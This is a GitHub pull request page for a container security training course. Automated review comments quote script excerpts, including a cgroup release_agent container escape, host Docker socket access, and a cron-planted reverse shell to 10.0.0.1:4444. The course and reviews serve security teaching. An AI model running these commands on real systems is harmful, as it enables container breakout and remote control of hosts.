Add Container Security Course content (Phase 1 + Modules 1 & 2)#1
Conversation
Adds the full Container Security video course under container-security-course/. Phase 1 (foundation): - Course outline (md/docx/pdf) and course summary (html/pdf) - Metadata template (md/docx/pdf) and top-level README - Sample module (Module 3 - Seccomp) with 3 video scripts and questions - DELIVERABLES_SUMMARY Module 1 - Container Security Fundamentals: - 6 video scripts (5 topic videos + module summary) - Module summary script, questions, and metadata Module 2 - Privileged Containers & Attack Vectors: - 5 video scripts (4 topic videos + module summary) - Module summary script, questions, and metadata All content provided in Markdown, DOCX, and PDF formats.
|
|
There was a problem hiding this comment.
Review Complete
This PR adds Phase 1 of the Container Security course content, including comprehensive video scripts, module materials, and course documentation. The content is well-structured and professionally prepared educational material.
Content Reviewed:
- 67 files including course outlines, README, metadata templates
- Module 1: Container Security Fundamentals (5 video scripts)
- Module 2: Privileged Containers & Attack Vectors (4 video scripts)
- Sample module on Seccomp (3 video scripts)
- Associated questions and metadata files
Security Assessment:
All content is educational material with no actual code implementation. The scripts demonstrate security concepts and attack techniques appropriately labeled for educational purposes with warnings like "
Findings:
No blocking issues identified. The content functions correctly as educational documentation. All commands and demonstrations are appropriate for a security training course with proper context and warnings.
The PR is ready for merge from a technical review perspective.
You can now have the agent implement changes and create commits directly on your pull request's source branch. Simply comment with /q followed by your request in natural language to ask the agent to make changes.
Analysis CompleteGenerated ECC bundle from 1 commits | Confidence: 60% View Pull Request #2Repository Profile
Changed Files (67)
Top hotspots
Top directories
Analysis Depth Readiness (commit-history, 7%)ECC Tools uses this to decide whether recommendations should stay at commit-history/setup guidance or expand into CI, security, harness, reference-set, AI-routing, and team backlog work.
Reference Set Readiness (0/7, 0%)
Review Activity (1 reviews, 0 inline comments, 0 unresolved threads)
Latest reviewer states
Review Follow-up Signals (1)
Recommended next actions
Detected Workflows (2)
Generated Instincts (17)
After merging, import with: Files
|
PR Summary by QodoAdd Container Security course package (Phase 1 + Modules 1–2)
AI Description
Diagram
High-Level Assessment
Files changed (45)
|
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 7c36289c13
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
|
|
||
| **[TYPE:]** | ||
| ```bash | ||
| docker stop $(docker ps -q) |
There was a problem hiding this comment.
Stop only the nginx trace container
This cleanup command uses every ID returned by docker ps -q; Docker documents ps as showing running containers by default and -q as only displaying their IDs, while docker stop accepts one or more containers. In any lab host that already has the repo's compose stack or other workloads running, this will stop unrelated containers, and the earlier docker exec $(docker ps -q) can also target the wrong container or fail with multiple IDs. Name the tracing container and stop/exec that specific name instead.
Useful? React with 👍 / 👎.
| Your organization discovers that all production hosts are running a Linux kernel version affected by CVE-2022-0185 (heap overflow in filesystem context handling, exploitable with CAP_SYS_ADMIN). Your containers run with default Docker settings (no `--privileged`, no extra capabilities). An operations engineer suggests that since no containers have CAP_SYS_ADMIN, the hosts are not at risk. Is this assessment correct? | ||
|
|
||
| **A)** Yes — without CAP_SYS_ADMIN in any container, the vulnerability cannot be exploited, so patching can be deferred | ||
| **B)** Partially — the direct exploit requires CAP_SYS_ADMIN, but if unprivileged user namespaces are enabled on the host, any container process can create a user namespace and obtain CAP_SYS_ADMIN within it, potentially triggering the vulnerability. The kernel must still be patched |
There was a problem hiding this comment.
Correct the default-Docker CVE answer
For the stated scenario of default Docker settings with no extra capabilities, this answer teaches an exploit path that the default seccomp policy prevents: Docker's default profile is an allowlist with SCMP_ACT_ERRNO, and the current profile only allows fsconfig when the container is configured with CAP_SYS_ADMIN; default containers also cannot freely unshare a user namespace. As written, the assessment marks the seccomp-based option wrong even though that mitigation is exactly what changes the risk in this environment, so students will learn the wrong operational conclusion unless the question is scoped to unconfined/custom-seccomp containers.
Useful? React with 👍 / 👎.
|
|
||
| ```bash | ||
| # Access Docker socket on the host | ||
| / # ls -la /mnt/host/var/run/docker.sock |
There was a problem hiding this comment.
Do not expect the Docker socket after a raw disk mount
This step follows the earlier mount /dev/sda2 /mnt/host, which mounts only the host's root filesystem from disk and does not include live tmpfs mounts such as /run//var/run. On a normal Linux host, /var/run/docker.sock lives in that tmpfs, so it will not appear under /mnt/host/var/run/docker.sock and the subsequent chrooted docker ps demo will fail; use a bind mount of / or explicitly explain/mount the runtime filesystem before relying on the socket.
Useful? React with 👍 / 👎.
|
|
||
| **[TYPE COMMAND:]** | ||
| ```bash | ||
| docker run --rm --name nginx-trace nginx:alpine /bin/sh -c "strace -c nginx -g 'daemon off;' 2>&1" | head -40 |
There was a problem hiding this comment.
Install strace before running it in nginx:alpine
This first discovery command runs strace inside the stock nginx:alpine image, but that image does not include strace by default; the later command correctly uses apk add strace first. As written, the opening demo fails with strace: not found before any syscall summary is produced, so the script should either install it here too or use a prepared image that contains it.
Useful? React with 👍 / 👎.
There was a problem hiding this comment.
Code Review
This pull request delivers the complete content for Modules 1 and 2 of the Container Security Masterclass, including video scripts, metadata, and assessment questions. The review feedback highlights several documentation inconsistencies in the README and course outline that need to be updated to match the final delivered structure. Additionally, a typo was identified in the sed commands within the Module 2 scripts, where \perdir should be corrected to upperdir for robust parsing of OverlayFS mount options.
Important
The consumer version of Gemini Code Assist on GitHub is being sunset. Starting June 18, 2026, new organization installations will be blocked, and all code review activity will officially cease on July 17, 2026.
For more details on the timeline and next steps, please review the Help Documentation.
| ## 📁 Directory Structure | ||
|
|
||
| ``` | ||
| container_security_course/ | ||
| ├── README.md # This file | ||
| ├── course_outline.md # Complete course structure | ||
| ├── course_summary.pdf # 6-page course overview | ||
| ├── course_summary.html # Source HTML for PDF | ||
| ├── metadata_template.md # Video metadata standard | ||
| └── sample_module/ # Module 3: Seccomp Profiles | ||
| ├── video_01_script.md # Introduction to Seccomp (12-14 min) | ||
| ├── video_02_script.md # Creating Custom Profiles (14-16 min) | ||
| ├── video_03_script.md # Troubleshooting & Best Practices (14-15 min) | ||
| └── module_questions.md # 3 module + 2 final assessment MCQs | ||
| ``` |
There was a problem hiding this comment.
| **Modules:** | ||
| 1. Course Introduction (15-20 min) | ||
| 2. Container Security Fundamentals (30-35 min) | ||
| 3. Attack Vectors and Vulnerabilities (35-40 min) | ||
| 4. **Seccomp Profiles in Practice** (40-45 min) ⭐ Sample Module | ||
| 5. AppArmor and SELinux (30-35 min) | ||
| 6. Orchestration and Supply Chain Security (30-35 min) | ||
| 7. Conclusion (10-15 min) |
There was a problem hiding this comment.
The module list and numbering in the README are inconsistent with course_outline.md and the actual delivered directories. In course_outline.md, the course introduction is Module 0, making the subsequent modules 0-indexed (Module 1 to Module 6). Additionally, Module 2 has been renamed to 'Privileged Containers & Attack Vectors' to match the delivered content. Let's update this list to maintain consistency.
| ## Module 1: Container Security Fundamentals | ||
| **Duration:** 30-35 minutes | ||
|
|
||
| ### Videos: | ||
| 1. **Container Isolation Deep Dive** (10-12 mins) | ||
| - How containers actually work (namespaces, cgroups) | ||
| - The shared kernel reality | ||
| - Isolation vs. virtualization | ||
| - **Demo:** Examining namespace isolation with live commands | ||
|
|
||
| 2. **Privileged Containers: The Security Nightmare** (10-12 mins) | ||
| - What makes a container privileged | ||
| - Capabilities and their risks | ||
| - **Lab:** Creating and examining privileged containers | ||
| - **Demo:** Breaking out of a privileged container | ||
|
|
||
| 3. **Container APIs and Attack Surface** (10-11 mins) | ||
| - Docker daemon socket exposure | ||
| - Remote API vulnerabilities | ||
| - **Demo:** Exploiting exposed Docker socket | ||
| - Securing container APIs |
There was a problem hiding this comment.
The video list and descriptions for Module 1 in the course outline do not match the actual delivered videos under module_01_fundamentals/. The delivered module has 5 videos (plus a summary) instead of the 3 originally planned. Let's update the outline to accurately reflect the final course structure.
| ## Module 2: Container Attack Vectors and Vulnerabilities | ||
| **Duration:** 35-40 minutes | ||
|
|
||
| ### Videos: | ||
| 1. **Container Escape Techniques** (12-15 mins) | ||
| - Kernel exploits through containers | ||
| - Capability abuse scenarios | ||
| - **Demo:** CVE-based container escape (using safe examples) | ||
| - Detection and prevention strategies | ||
|
|
||
| 2. **Image Security and Tampering** (12-13 mins) | ||
| - Malicious image analysis | ||
| - Supply chain attacks on images | ||
| - **Lab:** Analyzing a compromised image | ||
| - Image signing and verification with Docker Content Trust | ||
| - **Demo:** Setting up content trust | ||
|
|
||
| 3. **Insecure Configurations and DoS Attacks** (11-12 mins) | ||
| - Common misconfigurations (volume mounts, network modes) | ||
| - Resource limit bypasses | ||
| - **Demo:** Fork bomb and resource exhaustion attacks | ||
| - Implementing resource constraints | ||
| - **Lab:** Configuring secure container limits |
There was a problem hiding this comment.
The video list, title, and descriptions for Module 2 in the course outline do not match the actual delivered videos under module_02_privileged_containers/. The delivered module has been renamed to 'Privileged Containers & Attack Vectors' and contains 4 videos (plus a summary) instead of the 3 originally planned. Let's update the outline to keep it in sync with the delivered content.
|
|
||
| # Set the release agent to our payload (runs on HOST) | ||
| / # host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) | ||
| / # echo "$host_path/cmd" > /tmp/cgrp/release_agent |
There was a problem hiding this comment.
The sed command uses \perdir to parse the OverlayFS mount options from /etc/mtab. This is a common typo/corruption of upperdir found in various online container escape write-ups (likely caused by \u in \upperdir being stripped or corrupted by markdown/string parsers). While .*\perdir technically still works in some sed implementations because .* consumes the u and \p matches p, it is highly non-standard, fragile, and confusing. Replacing it with upperdir makes the regex correct, robust, and readable.
| / # echo 1 > /tmp/cgrp/exploit/notify_on_release | ||
|
|
||
| # Get the container's overlay path on the host | ||
| / # host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) |
There was a problem hiding this comment.
The sed command uses \perdir to parse the OverlayFS mount options from /etc/mtab. This is a common typo/corruption of upperdir found in various online container escape write-ups (likely caused by \u in \upperdir being stripped or corrupted by markdown/string parsers). While .*\perdir technically still works in some sed implementations because .* consumes the u and \p matches p, it is highly non-standard, fragile, and confusing. Replacing it with upperdir makes the regex correct, robust, and readable.
Code Review by Qodo
Context used✅ Compliance rules (platform):
1 rule 1. Wrong directory name shown
|
| ``` | ||
| container_security_course/ | ||
| ├── README.md # This file | ||
| ├── course_outline.md # Complete course structure | ||
| ├── course_summary.pdf # 6-page course overview | ||
| ├── course_summary.html # Source HTML for PDF | ||
| ├── metadata_template.md # Video metadata standard | ||
| └── sample_module/ # Module 3: Seccomp Profiles |
There was a problem hiding this comment.
1. Wrong directory name shown 🐞 Bug ≡ Correctness
container-security-course/README.md’s directory tree shows the root folder as container_security_course/, but the actual folder name in this repo is container-security-course/. This makes the documented directory layout incorrect for copy/paste and navigation.
Agent Prompt
## Issue description
`container-security-course/README.md` documents the package root folder as `container_security_course/` (underscores), but the real folder in the repository is `container-security-course/` (hyphens). This makes the directory structure snippet wrong.
## Issue Context
The README is located under `container-security-course/`, so the tree should reflect that exact directory name.
## Fix Focus Areas
- container-security-course/README.md[27-41]
ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools
| # Container Security Course - Phase 1 Package | ||
| ## Complete Course Development Deliverables | ||
|
|
||
| **Course Title:** Container Security: From Basics to Advanced Protection | ||
| **Duration:** 3.5-4 hours | ||
| **Level:** Intermediate | ||
| **Format:** Video-based with hands-on labs | ||
| **Phase:** 1 (Planning & Sample Module) | ||
| **Delivery Date:** July 5, 2026 | ||
|
|
||
| --- | ||
|
|
||
| ## 📦 Package Contents | ||
|
|
||
| This Phase 1 package contains everything needed to evaluate, approve, and begin production of the complete container security course. All deliverables meet publisher technical requirements. | ||
|
|
There was a problem hiding this comment.
2. Readme phase scope mismatch 🐞 Bug ⚙ Maintainability
container-security-course/README.md states the package is Phase 1 (planning + sample module), but the repo content and deliverables summary indicate Phase 2 deliverables for Modules 1 & 2 are included. This inconsistency can mislead reviewers/users about what content is actually present.
Agent Prompt
## Issue description
`container-security-course/README.md` describes the package as Phase 1 (planning + sample module), but the PR includes completed content for Modules 1 and 2 (and the deliverables summary calls it Phase 2). This mismatch can cause readers to overlook Modules 1 & 2 or misunderstand what the package contains.
## Issue Context
The repository now contains full Module 1 and Module 2 deliverables (metadata/scripts/questions), and `DELIVERABLES_SUMMARY.txt` describes them as Phase 2.
## Fix Focus Areas
- container-security-course/README.md[1-20]
- container-security-course/README.md[27-41]
- container-security-course/DELIVERABLES_SUMMARY.txt[1-12]
ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools
| # Get the container's overlay path on the host | ||
| / # host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) | ||
| / # echo "$host_path/cmd" > /tmp/cgrp/release_agent |
There was a problem hiding this comment.
3. Broken/unclear sed extraction 🐞 Bug ≡ Correctness
The cgroup release_agent demo uses sed -n 's/.*\perdir=... to derive host_path, which is unclear (contains a \p escape) and does not explicitly match the intended overlay upperdir= field. This can cause the demo commands to fail or extract the wrong path when learners follow the scripts.
Agent Prompt
## Issue description
In the cgroup `release_agent` escape steps, the script extracts `host_path` using:
`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
This is unclear (contains `\p`) and doesn’t explicitly match the intended `upperdir=` overlay mount option, which is what the preceding comment says it is trying to extract.
## Issue Context
The same extraction appears in multiple Module 2 scripts in the `release_agent` sections.
## Fix Focus Areas
- container-security-course/module_02_privileged_containers/video_02_script.md[233-235]
- container-security-course/module_02_privileged_containers/video_03_script.md[53-61]
ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools
There was a problem hiding this comment.
Pull request overview
Adds substantial Container Security Course content under container-security-course/, including Phase/package documentation plus full written scripts/metadata/questions for Modules 1 & 2 and a Seccomp sample module (Module 3).
Changes:
- Introduces the Phase/package README, course outline, and HTML source used to generate the course summary PDF.
- Adds complete lesson scripts, assessment questions, and metadata for Module 1 (Fundamentals) and Module 2 (Privileged Containers & Attack Vectors).
- Adds a Seccomp sample module (Module 3) with 3 full video scripts + module assessment questions.
Reviewed changes
Copilot reviewed 24 out of 67 changed files in this pull request and generated 20 comments.
Show a summary per file
| File | Description |
|---|---|
| container-security-course/README.md | Package overview, directory structure, and deliverables checklist for Phase/package review. |
| container-security-course/course_outline.md | Master outline describing modules, videos, labs, objectives, and delivery notes. |
| container-security-course/course_summary.html | HTML source for rendering the course summary PDF and marketing preview. |
| container-security-course/metadata_template.md | Standard metadata template + example for consistent video metadata across the course. |
| container-security-course/DELIVERABLES_SUMMARY.txt | Consolidated “what’s included” summary for reviewers/producers. |
| container-security-course/sample_module/video_01_script.md | Sample Seccomp module: intro script covering fundamentals and Docker default profile. |
| container-security-course/sample_module/video_02_script.md | Sample Seccomp module: hands-on custom profile creation workflow using strace. |
| container-security-course/sample_module/video_03_script.md | Sample Seccomp module: troubleshooting + production practices + Kubernetes integration. |
| container-security-course/sample_module/module_questions.md | Sample Seccomp module assessments (module-level + final exam style questions). |
| container-security-course/module_01_fundamentals/module_summary_script.md | Module 1 summary/orientation script. |
| container-security-course/module_01_fundamentals/video_01_script.md | Module 1 lesson script: namespaces/cgroups/filesystem isolation deep dive. |
| container-security-course/module_01_fundamentals/video_02_script.md | Module 1 lesson script: container vs VM security model comparison. |
| container-security-course/module_01_fundamentals/video_03_script.md | Module 1 lesson script: shared kernel risk and mitigation overview. |
| container-security-course/module_01_fundamentals/video_04_script.md | Module 1 lesson script: Docker daemon/socket security and hardening guidance. |
| container-security-course/module_01_fundamentals/video_05_script.md | Module 1 lesson script: attack surface mapping and scanning demos. |
| container-security-course/module_01_fundamentals/questions.md | Module 1 assessment questions (module + final assessment contributions). |
| container-security-course/module_01_fundamentals/metadata.md | Module 1 per-video metadata for production/LMS integration. |
| container-security-course/module_02_privileged_containers/module_summary_script.md | Module 2 summary/orientation script. |
| container-security-course/module_02_privileged_containers/video_01_script.md | Module 2 lesson script: privileged containers—what they change and why dangerous. |
| container-security-course/module_02_privileged_containers/video_02_script.md | Module 2 lesson script: privileged container host compromise walkthroughs. |
| container-security-course/module_02_privileged_containers/video_03_script.md | Module 2 lesson script: escalation techniques from individual misconfigs/capabilities. |
| container-security-course/module_02_privileged_containers/video_04_script.md | Module 2 lesson script: CVE analysis and exploitation chains across stack layers. |
| container-security-course/module_02_privileged_containers/questions.md | Module 2 assessment questions (module + final assessment contributions). |
| container-security-course/module_02_privileged_containers/metadata.md | Module 2 per-video metadata for production/LMS integration. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| ## 📁 Directory Structure | ||
|
|
||
| ``` | ||
| container_security_course/ |
| **Purpose:** Complete blueprint for the 3.5-4 hour course | ||
|
|
||
| **Contents:** | ||
| - 6 modules with detailed learning objectives |
| <span class="stat-number">6</span> | ||
| <span class="stat-label">Modules</span> | ||
| </div> |
| CONTAINER SECURITY MASTERCLASS — DELIVERABLES SUMMARY | ||
| Phase 2: Modules 1 & 2 Complete Content | ||
| Generated: July 2026 |
| ```bash | ||
| docker run --rm --name nginx-trace nginx:alpine /bin/sh -c "strace -c nginx -g 'daemon off;' 2>&1" | head -40 | ||
| ``` |
| # Write a cron job to the host's cron directory | ||
| / # echo '* * * * * root bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' \ | ||
| > /app/logs/../cron.d/backdoor |
| / # echo '* * * * * root bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' \ | ||
| > /app/logs/../cron.d/backdoor | ||
| ``` | ||
| *"Using path traversal relative to the mounted directory, I wrote a reverse shell cron job to the host's /var/cron.d/. This executes on the host every minute."* |
|
|
||
| **Visual Elements:** | ||
| - Cover page with branding | ||
| - Stats grid (6 modules, 20+ videos, 12 labs) |
|
|
||
| ## ✅ Phase 1 Completion Checklist | ||
|
|
||
| - [x] Course outline with 6 modules and 20+ videos |
|
|
||
| **[TYPE:]** | ||
| ```bash | ||
| grep -oP '^[^\(]+' nginx_strace_output.txt | sort -u > nginx_syscalls.txt |



Container Security Course Content
This PR adds the complete Phase 1 foundation plus Modules 1 & 2 of the Container Security course, organized under
container-security-course/.Contents (67 files)
Phase 1 Foundations
Module 1: Container Security Fundamentals (~35 min)
Module 2: Privileged Containers & Attack Vectors (~35 min)
--privilegedrisks, host compromise, privilege escalation, container escapes, CVE analysis (CVE-2019-5736, CVE-2020-15257, CVE-2022-0185)Sample Module (Seccomp)
Production Standards
Please review before merging.